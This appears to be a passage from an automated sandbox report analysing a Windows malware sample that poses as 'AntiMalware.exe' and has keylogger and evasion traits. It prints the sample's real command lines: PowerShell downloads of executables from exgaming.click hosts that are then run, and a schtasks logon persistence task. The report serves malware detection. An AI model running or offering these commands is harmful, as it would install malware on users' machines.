                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3668Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5364Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 4756 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448Thread sleep count: 5574 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep count: 4815 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448Thread sleep count: 137 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep count: 5180 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684Thread sleep count: 1511 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216Thread sleep count: 4930 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 1968 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4448Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep count: 5318 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep count: 1689 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: AntiMalware.exe, 00000012.00000002.4433952146.000000001DF50000.00000004.00000020.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4434584090.000000001E04A000.00000004.00000020.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4433398592.000000001C42E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: amsi64_2108.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_4444.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_4204.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_2464.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_4408.amsi.csv, type: OTHER
                            Source: Yara matchFile source: amsi64_5144.amsi.csv, type: OTHER
                            .NET source code references suspicious native API functions
                            Source: ZzOTKK2V8l.exe, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                            Source: ZzOTKK2V8l.exe, DInvokeCore.csReference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
                            Source: ZzOTKK2V8l.exe, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exitJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exitJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exitJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exit
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exit
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exit
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exitJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exitJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell (new-object system.net.webclient).downloadfile('http://xcu.exgaming.click', '%temp%\\expiorer.exe') & powershell (new-object system.net.webclient).downloadfile('http://xcu5.exgaming.click', '%temp%\\expliorer.exe') & powershell start-process -filepath '%temp%\\expiorer.exe' & powershell start-process -filepath '%temp%\\expliorer.exe' & exit
                            Source: AntiMalware.exe, 00000012.00000002.4423691168.00000000036B7000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.0000000003B27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                            Source: AntiMalware.exe, 00000012.00000002.4423691168.00000000036B7000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.00000000036FE000.00000004.00000800.00020000.00000000.sdmp, AntiMalware.exe, 00000012.00000002.4423691168.00000000036CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeQueries volume information: C:\Users\user\Desktop\ZzOTKK2V8l.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeQueries volume information: C:\Users\user\AppData\Roaming\AntiMalware.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeQueries volume information: C:\Users\user\AppData\Roaming\AntiMalware.exe VolumeInformation
